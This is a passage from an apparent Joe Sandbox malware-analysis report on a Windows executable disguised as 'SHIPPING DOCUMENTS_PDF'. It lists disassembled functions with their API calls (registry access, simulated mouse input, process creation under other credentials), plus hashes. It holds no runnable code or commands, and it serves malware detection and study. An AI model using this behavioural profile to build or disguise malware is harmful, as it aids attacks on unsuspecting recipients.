                                                                                      • Part of subcall function 00B79B5C: DeleteCriticalSection.KERNEL32(00C0EC00,?,?,00B79AF9,00B77CD0,00C0A0B8,00000014), ref: 00B79C7F
                                                                                    • __calloc_crt.LIBCMT ref: 00B79B19
                                                                                    • __initptd.LIBCMT ref: 00B79B3B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B79B42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                    • String ID:
                                                                                    • API String ID: 3567560977-0
                                                                                    • Opcode ID: fe6b3a0605a95e3c503b06c467115b59ed7865f46a842d7f9f61f738295545c9
                                                                                    • Instruction ID: a3d792a3b8cbd202e7dd9321490c9b3a74dea6172018385965d7f73cd02ae927
                                                                                    • Opcode Fuzzy Hash: fe6b3a0605a95e3c503b06c467115b59ed7865f46a842d7f9f61f738295545c9
                                                                                    • Instruction Fuzzy Hash: C7F0903254A7126AE6347B74BC07B8A27D1DF02730F20CAEAF57CD61D2FF20884141A0
                                                                                    Function 00B7406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B73F85), ref: 00B74085
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00B7408C
                                                                                    • EncodePointer.KERNEL32(00000000), ref: 00B74097
                                                                                    • DecodePointer.KERNEL32(00B73F85), ref: 00B740B2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                    • API String ID: 3489934621-2819208100
                                                                                    • Opcode ID: c0223a6653b44cd07f40a51653a4fe846a0f4fccdec8b3977a19951b56508483
                                                                                    • Instruction ID: 8bd2a7d5c656f4c1964015e0843eded6867060b0f8d315b13a3ae295781b98b4
                                                                                    • Opcode Fuzzy Hash: c0223a6653b44cd07f40a51653a4fe846a0f4fccdec8b3977a19951b56508483
                                                                                    • Instruction Fuzzy Hash: 65E09A7058A241ABEA119F61EC19B597AE5B705746F208075F112E21E0DFB64604DA14
                                                                                    Function 00B51DB3 Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,?), ref: 00B51DDC
                                                                                    • GetWindowRect.USER32(?,?), ref: 00B51E1D
                                                                                    • ScreenToClient.USER32(?,?), ref: 00B51E45
                                                                                    • GetClientRect.USER32(?,?), ref: 00B51F74
                                                                                    • GetWindowRect.USER32(?,?), ref: 00B51F8D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                    • String ID:
                                                                                    • API String ID: 1296646539-0
                                                                                    • Opcode ID: 0ee99293129a5741a0252913514a836ddb7f6cefa67430707b82076ba4df4d1b
                                                                                    • Instruction ID: 62d967deeb2a43b802522f7b2a73d3adf053aea0fd26b38fdf48634c789436c1
                                                                                    • Opcode Fuzzy Hash: 0ee99293129a5741a0252913514a836ddb7f6cefa67430707b82076ba4df4d1b
                                                                                    • Instruction Fuzzy Hash: C3B15B7990024ADBDF10CFA8C581BEEB7F1FF08315F1485A9EC599B254EB30AA54CB54
                                                                                    Function 00BB64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3253778849-0
                                                                                    • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                                    • Instruction ID: 03a47184b5b677349ac2893860b8ba8029d34e5e6635e66b296bfce904642b00
                                                                                    • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                                    • Instruction Fuzzy Hash: 1A616A3090065A9BDF11EF64CC82BFE37E5AF05308F0445E9FC5A6B192DA78AD19CB51
                                                                                    Function 00BD01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD02BD
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD02FD
                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BD0320
                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BD0349
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BD038C
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD0399
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4046560759-0
                                                                                    • Opcode ID: a2d8e106b7fb1951cdb117da7cb525c34788580759e846f4867547023f755ca4
                                                                                    • Instruction ID: 858f21f1ad90d822d41cdb45ea28fd9af1bc3b8770543e994d5c15d16c08f31b
                                                                                    • Opcode Fuzzy Hash: a2d8e106b7fb1951cdb117da7cb525c34788580759e846f4867547023f755ca4
                                                                                    • Instruction Fuzzy Hash: 96516C71218304AFC710EF64D895E6EBBE8FF89314F04499EF855872A1EB31E909CB52
                                                                                    Function 00BD5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetMenu.USER32(?), ref: 00BD57FB
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00BD5832
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BD585A
                                                                                    • GetMenuItemID.USER32(?,?), ref: 00BD58C9
                                                                                    • GetSubMenu.USER32(?,?), ref: 00BD58D7
                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BD5928
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                    • String ID:
                                                                                    • API String ID: 650687236-0
                                                                                    • Opcode ID: d389b20098aeb764f3537682537d81c2a1f52eab1144d186ed1e6a74ea1a9b62
                                                                                    • Instruction ID: 7cce33a29f35f4ff8ec84fe43652345d46e20d68a9371a00950ac53c53fde9a1
                                                                                    • Opcode Fuzzy Hash: d389b20098aeb764f3537682537d81c2a1f52eab1144d186ed1e6a74ea1a9b62
                                                                                    • Instruction Fuzzy Hash: 00517C31E01A15EFCF10EF64C855AAEB7F4EF48310F1040A6E816AB351DB75AE419B90
                                                                                    Function 00BAEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BAEF06
                                                                                    • VariantClear.OLEAUT32(00000013), ref: 00BAEF78
                                                                                    • VariantClear.OLEAUT32(00000000), ref: 00BAEFD3
                                                                                    • _memmove.LIBCMT ref: 00BAEFFD
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BAF04A
                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BAF078
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1101466143-0
                                                                                    • Opcode ID: 11c6a21bff0d86b316f446e421ed542d0ecdec8cadcb875e931a4136a308133e
                                                                                    • Instruction ID: 151b5b3d21c36c2ced26e2406ecbed2465667615c015f0d03595d6d50ca0bb78
                                                                                    • Opcode Fuzzy Hash: 11c6a21bff0d86b316f446e421ed542d0ecdec8cadcb875e931a4136a308133e
                                                                                    • Instruction Fuzzy Hash: 67516D75A0020AEFDB24CF58C890AAAB7F8FF4D314B15856AE959DB301E735E911CF90
                                                                                    Function 00BB220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2258
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB22A3
                                                                                    • IsMenu.USER32(00000000), ref: 00BB22C3
                                                                                    • CreatePopupMenu.USER32 ref: 00BB22F7
                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00BB2355
                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BB2386
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3311875123-0
                                                                                    • Opcode ID: 642f937eaf146de231839f02788fc9cd2e763ed1a4e9c72e33a26c36b2c0eaba
                                                                                    • Instruction ID: d2949a4e5c03a4deef456a96bd5b2231885b887a12d9fd4ad03d315efd809fc0
                                                                                    • Opcode Fuzzy Hash: 642f937eaf146de231839f02788fc9cd2e763ed1a4e9c72e33a26c36b2c0eaba
                                                                                    • Instruction Fuzzy Hash: 9E51CF30A0120ADFDF21CF68D888BFEBBF5EF45318F1041A9E811972A0D7B48944CB55
                                                                                    Function 00B51765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B5179A
                                                                                    • GetWindowRect.USER32(?,?), ref: 00B517FE
                                                                                    • ScreenToClient.USER32(?,?), ref: 00B5181B
                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B5182C
                                                                                    • EndPaint.USER32(?,?), ref: 00B51876
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                    • String ID:
                                                                                    • API String ID: 1827037458-0
                                                                                    • Opcode ID: 54235809e368fca13276a0cf668134beda2d0fa4d9ce9b00b2fcdba12e3e490a
                                                                                    • Instruction ID: 994753b922fc0c7c573be4b91f44f0a20729186e6ce03f2249413325237545f7
                                                                                    • Opcode Fuzzy Hash: 54235809e368fca13276a0cf668134beda2d0fa4d9ce9b00b2fcdba12e3e490a
                                                                                    • Instruction Fuzzy Hash: 11419C71504601EFD720DF28CC84FBA7BE8FB4A725F044AA9F9A5872B1D7309849DB61
                                                                                    Function 00BDB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00C157B0,00000000,00D552E0,?,?,00C157B0,?,00BDB5A8,?,?), ref: 00BDB712
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00BDB736
                                                                                    • ShowWindow.USER32(00C157B0,00000000,00D552E0,?,?,00C157B0,?,00BDB5A8,?,?), ref: 00BDB796
                                                                                    • ShowWindow.USER32(00000000,00000004,?,00BDB5A8,?,?), ref: 00BDB7A8
                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00BDB7CC
                                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BDB7EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 642888154-0
                                                                                    • Opcode ID: 048f46d94350afee4b01a53d37d848d5d5012028064a5b3df595478a03a2a2dd
                                                                                    • Instruction ID: 24b4aa5bd017cf438fa5b8801036aff1153e06d18c52c2ce31e9b2ced28d00ce
                                                                                    • Opcode Fuzzy Hash: 048f46d94350afee4b01a53d37d848d5d5012028064a5b3df595478a03a2a2dd
                                                                                    • Instruction Fuzzy Hash: F9416A34605241EFDB26CF24C499FA4BBE0FB45310F1981EAE9598F7A2DB31AC56CB50
                                                                                    Function 00BC709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00BC4E41,?,?,00000000,00000001), ref: 00BC70AC
                                                                                      • Part of subcall function 00BC39A0: GetWindowRect.USER32(?,?), ref: 00BC39B3
                                                                                    • GetDesktopWindow.USER32 ref: 00BC70D6
                                                                                    • GetWindowRect.USER32(00000000), ref: 00BC70DD
                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BC710F
                                                                                      • Part of subcall function 00BB5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                                                                    • GetCursorPos.USER32(?), ref: 00BC713B
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BC7199
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4137160315-0
                                                                                    • Opcode ID: 82ceb8e8579bbc831f4d01ebc284cd034b60272532362d23219618507de3f6ae
                                                                                    • Instruction ID: 14b8dd306c441d4070de01a8206e67ee89597a4700b4b1520d330903d0c6ce9e
                                                                                    • Opcode Fuzzy Hash: 82ceb8e8579bbc831f4d01ebc284cd034b60272532362d23219618507de3f6ae
                                                                                    • Instruction Fuzzy Hash: F231C472509306ABD720DF14D849FABB7E9FF88314F04095EF585A7191DB70EA09CB92
                                                                                    Function 00BA8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BA80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BA80C0
                                                                                      • Part of subcall function 00BA80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BA80CA
                                                                                      • Part of subcall function 00BA80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BA80D9
                                                                                      • Part of subcall function 00BA80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BA80E0
                                                                                      • Part of subcall function 00BA80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BA80F6
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00BA842F), ref: 00BA88CA
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BA88D6
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00BA88DD
                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00BA88F6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00BA842F), ref: 00BA890A
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00BA8911
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 3008561057-0
                                                                                    • Opcode ID: 1f8a43ba19a3bc3c149f74988447ae0e60dc23925732f2c160f6fc74a02a0c86
                                                                                    • Instruction ID: 203ebe502f0785d35cdb45d5ffb0c1906cc150bf8c878c3a1b4829b3f3d635b0
                                                                                    • Opcode Fuzzy Hash: 1f8a43ba19a3bc3c149f74988447ae0e60dc23925732f2c160f6fc74a02a0c86
                                                                                    • Instruction Fuzzy Hash: A511A271506206FFDB109F94DC19BBFB7B8EB46311F148069E846A7110DB369E00DB60
                                                                                    Function 00BA85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BA85E2
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00BA85E9
                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00BA85F8
                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00BA8603
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BA8632
                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00BA8646
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: dfe7802f39bfbcdbe891c756ca2a994e0ab09d724810c75fd28e20e6d3551263
                                                                                    • Instruction ID: 1bfe341ee254715ef8de3e5abc73d6d5afe43301f8d3da12bd57127e74387e6e
                                                                                    • Opcode Fuzzy Hash: dfe7802f39bfbcdbe891c756ca2a994e0ab09d724810c75fd28e20e6d3551263
                                                                                    • Instruction Fuzzy Hash: 97115C7250520AABDF01CFA8DD49BEEBBE9EF09304F044065FE05A2160DB718D60DB60
                                                                                    Function 00BAB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00BAB7B5
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00BAB7C6
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BAB7CD
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00BAB7D5
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00BAB7EC
                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 00BAB7FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
